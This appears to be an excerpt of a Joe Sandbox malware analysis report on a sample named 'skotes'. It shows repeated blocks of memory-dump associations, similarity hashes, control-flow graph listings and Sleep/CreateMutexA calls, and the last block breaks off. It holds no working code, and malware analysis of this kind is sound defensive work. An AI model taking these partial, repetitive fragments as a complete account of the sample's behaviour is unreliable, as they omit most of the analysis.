                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 8885d981b898c9c49647260ff4e1bfc649e33894c5e40d1005f0c9f9e63b319a
                                                                                                                • Instruction ID: b74463b2fd256fe6f03bd9a6dad8a604126dbe67b9acc452d4b40f113a428441
                                                                                                                • Opcode Fuzzy Hash: 8885d981b898c9c49647260ff4e1bfc649e33894c5e40d1005f0c9f9e63b319a
                                                                                                                • Instruction Fuzzy Hash: 3C312A31745104EBFB18FBB8DC8DBADB761EB85314F24861AE054DB2D6DB3D99808722

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 202 78a682-78a6a2 206 78a6d0-78a6ec 202->206 207 78a6a4-78a6b0 202->207 208 78a71a-78a739 206->208 209 78a6ee-78a6fa 206->209 210 78a6b2-78a6c0 207->210 211 78a6c6-78a6cd call 79d663 207->211 216 78a73b-78a747 208->216 217 78a767-78a916 call 7980c0 208->217 214 78a6fc-78a70a 209->214 215 78a710-78a717 call 79d663 209->215 210->211 212 78a949 210->212 211->206 218 78a94e 212->218 219 78a949 call 7b6c6a 212->219 214->212 214->215 215->208 223 78a749-78a757 216->223 224 78a75d-78a764 call 79d663 216->224 227 78a953-78a994 Sleep CreateMutexA 218->227 228 78a94e call 7b6c6a 218->228 219->218 223->212 223->224 224->217 234 78a996-78a998 227->234 235 78a9a7-78a9a8 227->235 228->227 234->235 236 78a99a-78a9a5 234->236 236->235
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 8d5c58490871cad0fe1295140270f2d6f65798bf0f4ee32d567a2df78f94868b
                                                                                                                • Instruction ID: 5ac43b6bf6750e53af7cfa393978d46bb976c76a4a491dfea0434ca28d3aa2cf
                                                                                                                • Opcode Fuzzy Hash: 8d5c58490871cad0fe1295140270f2d6f65798bf0f4ee32d567a2df78f94868b
                                                                                                                • Instruction Fuzzy Hash: A0312831744144EBFB18BB78DC8DBADB772EB85310F24861AE014D72D6D73D99808762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 238 789adc-789ae8 239 789aea-789af8 238->239 240 789afe-789b27 call 79d663 238->240 239->240 241 78a917 239->241 247 789b29-789b35 240->247 248 789b55-789b57 240->248 244 78a953-78a994 Sleep CreateMutexA 241->244 245 78a917 call 7b6c6a 241->245 254 78a996-78a998 244->254 255 78a9a7-78a9a8 244->255 245->244 250 789b4b-789b52 call 79d663 247->250 251 789b37-789b45 247->251 252 789b59-78a916 call 7980c0 248->252 253 789b65-789d91 call 797a00 call 785c10 call 788b30 call 798220 call 797a00 call 785c10 call 788b30 call 798220 248->253 250->248 251->241 251->250 254->255 256 78a99a-78a9a5 254->256 256->255
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 844b052457b414728619284af067b3481d7aa41bfcbdd99eef1acfe69ae4de67
                                                                                                                • Instruction ID: 03d024845a8e9d66749fecda1b10b4eaf77d8b1af2facb3e96428892eaea252e
                                                                                                                • Opcode Fuzzy Hash: 844b052457b414728619284af067b3481d7aa41bfcbdd99eef1acfe69ae4de67
                                                                                                                • Instruction Fuzzy Hash: C3216731748640EBFB18BB68ECCD76CB762EBD1310F24421AE148C72D1DB7D69808712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 315 78a856-78a86e 316 78a89c-78a89e 315->316 317 78a870-78a87c 315->317 320 78a8a9-78a8b1 call 787d30 316->320 321 78a8a0-78a8a7 316->321 318 78a87e-78a88c 317->318 319 78a892-78a899 call 79d663 317->319 318->319 322 78a94e 318->322 319->316 332 78a8b3-78a8bb call 787d30 320->332 333 78a8e4-78a8e6 320->333 324 78a8eb-78a916 call 7980c0 321->324 329 78a953-78a987 Sleep CreateMutexA 322->329 330 78a94e call 7b6c6a 322->330 335 78a98e-78a994 329->335 330->329 332->333 340 78a8bd-78a8c5 call 787d30 332->340 333->324 337 78a996-78a998 335->337 338 78a9a7-78a9a8 335->338 337->338 339 78a99a-78a9a5 337->339 339->338 340->333 344 78a8c7-78a8cf call 787d30 340->344 344->333 347 78a8d1-78a8d9 call 787d30 344->347 347->333 350 78a8db-78a8e2 347->350 350->324
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 0c440f2c86f4aa3d6b06a0b8c73ab69ec7ccd5b155254b1c5178447f1251d4fe
                                                                                                                • Instruction ID: 8247c7af08b37805cce49dd9aa76d2a3210f61bac2dcb1587db21e37f1e2389b
                                                                                                                • Opcode Fuzzy Hash: 0c440f2c86f4aa3d6b06a0b8c73ab69ec7ccd5b155254b1c5178447f1251d4fe
                                                                                                                • Instruction Fuzzy Hash: 822128713C9200EAFB2977A89C9EB6DB3629F91300F244817E148D72D1DA7E99808373

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 292 78a34f-78a35b 293 78a35d-78a36b 292->293 294 78a371-78a39a call 79d663 292->294 293->294 295 78a93a 293->295 300 78a3c8-78a916 call 7980c0 294->300 301 78a39c-78a3a8 294->301 297 78a953-78a994 Sleep CreateMutexA 295->297 298 78a93a call 7b6c6a 295->298 308 78a996-78a998 297->308 309 78a9a7-78a9a8 297->309 298->297 302 78a3aa-78a3b8 301->302 303 78a3be-78a3c5 call 79d663 301->303 302->295 302->303 303->300 308->309 310 78a99a-78a9a5 308->310 310->309
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: d2e2c0e0977fe0d05d213e1a4b8cbee0770fe03664116eb0053eb45680d307f0
                                                                                                                • Instruction ID: b57475d5aacb162ccdc195649d82413d6a8181efcfac82a1a6fcc039a88236b7
                                                                                                                • Opcode Fuzzy Hash: d2e2c0e0977fe0d05d213e1a4b8cbee0770fe03664116eb0053eb45680d307f0
